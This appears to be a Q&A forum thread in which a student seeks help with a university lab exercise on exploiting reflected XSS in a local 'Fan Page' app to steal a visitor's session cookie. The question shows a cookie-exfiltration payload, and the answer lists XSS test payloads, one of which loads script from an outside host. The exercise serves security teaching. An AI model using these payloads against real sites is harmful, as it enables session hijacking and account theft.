# Get session cookie (xss, payload)

Tags: javascript, html, cookies, xss, payload

I have a problem with getting the session cookie. I tried to rewrite the URL name from this `http://127.0.0.1:55555 to this http://127.0.0.1:55555/?p=<script>document.write('<img src=http://127.0.0.1:55555/?c='document.cookie+'/>');</script>` but I am unable to get the session cookies.

This is a project work in the university, and the teacher asked two questions about it, to help us get to know what's wrong with this

- Are you sure that the payloads are working and running?
- Are you sure that you should send the request to this local server?

I still do not really get how should I rewrite the URL.

This is how the whole page looks like:

[image]

And this is the link where the ZIP file is: https://drive.google.com/file/d/18VyalmoQdiZ0lKhvEGazfiXSwoLKgp_8/view?usp=sharing

Comment: Please state clear what is the server behave and tell what you want to do and actual happening, I don't have your homework in hand

Comment: This is the exercise, Exploit the cross-site scripting vulnerability of the "Fan Page" to obtain the session ID of the "Fan" visiting the page, and then use it to obtain the "flag" that confirms the completion of the task.

The task is to generate a URL that can exploit the vulnerability, from which the application will automatically generate a link that the "Fan" can access on the page. The "Fan" who visits the page at regular intervals will automatically click on the link placed on the page, providing the user interaction necessary to execute the attack.

Comment: Are you sure the Session ID is stored in a cookie? It's a rather insecure practice as Session IDs are stored in PHP on the server in /temp normally. Did you inspect the Cookies? Do they even contain what you try to fetch via XSS in the first place?

Comment: And this is what they wrote we should do, The SHA1 hash of the Selene.zip file is 961234808588febd6e00d90bc82116203085f3d7. To check the integrity of the file, run the SHA1 command certutil -hashfile Selene.zip.
Retrieved from
To solve this problem, you need to use Microsoft Edge, Mozilla Firefox or another browser other than Google Chrome. To complete the exercise, you must submit the following:A URL (the payload) created to exploit the vulnerability.An uncropped screenshot of the successful execution of the attack.

Comment: The part about SHA1 hash is irrelevant in this case as it's just to check if the file wasn't corrupted during download. It has nothing to do with XSS. Maybe you can share the file here so we can take a look on what exactly it's about? Your question isn't very complete and pretty hard to test being a localhost site.

Comment: Yes the teacher sad that the we could get it throught cookies. But we can not see the cookies yet.

Comment: Okay, i will share the files.

Comment: If there's no cookie there, then there's nothing for your XSS to retrieve because XSS works on your computer, locally, not on the server of the website. The data has to already be stored locally.

Comment: I see the photo you provided, but I am afraid it's not enough. To be able to help you I need the actual HTML to be able to see what field gets the input, etc.

Comment: I shared how the page looks like, unforrtunetly i don't know how to share a ZIP file here.

Comment: You can upload it to MEGA or DropBox and attach the link here. I am afraid that the image isn't enough to tell what goes on in the code behind.

Comment: Okay, thanks. I will try that

Comment: https://drive.google.com/file/d/18VyalmoQdiZ0lKhvEGazfiXSwoLKgp_8/view?usp=sharing
I hope this will work

Comment: I have requested access as you have to grant access on Drive. Please check.

Comment: Ohh yes sorry, now i think it's fine

Comment: Yes, I was able to get it now and will do some tests on my own and update my answer below.

Comment: Thank you so much

Answer (score 1):

Multiple things could be at play. Without having enough details and any source code to work with in your question, I'd say pay attention to:

1. You may be blocked by the browser's built-in XSS protection.
2. You may not be piping the javascript into any vulnerable field. Without knowing what on your page uses the value from `?p=` it's hard to determinate. We may need to see the full source code of the page.
3. Depending on what you try to achieve, your javascript for the XSS might be wrong.
4. The cookie you try to retrieve via XSS may not exist or may be empty. XSS runs locally on your browser, not on the server of the website so the data you try to grab must already exist stored in the cookies.

To test if the target is really vulnerable to XSS, please have a look at some of the XSS payloads below. They're simple so if there really is XSS, you may have success.

https://github.com/payloadbox/xss-payload-list

Some example of good XSS payloads to test:

```
<script\x20type="text/javascript">javascript:alert(1);</script>
<script>javascript:alert(1)</script\x0D
<svg><x><script>alert(1)</x>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<BODY ONLOAD=alert('XSS')>
```

You can try each one by replacing yours, like this:

```
http://127.0.0.1:55555/?p=<BODY ONLOAD=alert('XSS')>
```

If any of these work, it means you do have an XSS vulnerable field and there's something wrong with your XSS code if it doesn't retrieve the cookie.

Unfortunately, I cannot help more until you make it more clear what your goal is, and maybe post the source code of the website in question.

Comment: I tried one of these and it worked. :D

Comment: If it did, it means that your target is indeed XSS vulnerable. We just need to build a proper payload.

Comment: Like what i tried to do? Or that's totaly wrong?

Comment: Alright, so I've carried some extensive testing. There's no Session ID or Cookie ever set by the website so XSS wouldn't ever be able to grab it, at least not from what files I have. Are you sure you need to grab any sessions? If XSS is all you need, the example I gave you that worked proves you do have XSS and it's enough.

Comment: That was what we could get out from the exercise, that we have to get the session cookie, because it said that we should get the session id.  Maybe the website does not have it but if we wrote the correct URL to get sessions we will get it. 

Comment: XSS only runs locally, so the session would have to be set by the time you run your XSS payload otherwise there's nothing to get. I've checked multiple times and the site doesn't seem to be setting any cookies or sessions.

Comment: To be honest we trying to solve it for a long time, and we have no idea how to get the "flag"  we have only that strongpoint what the teacher said about our solution 

Comment: Are the requirements written on a PDF you can send me? I can attempt to reverse engineer the Selene binary to see what's up.

Comment: It's not but i will put it in a PDF file.

Comment: I convert it to pdf, https://drive.google.com/file/d/1UP-k8Pm83Z2ACd--RpYryBz2lW8onm8I/view?usp=sharing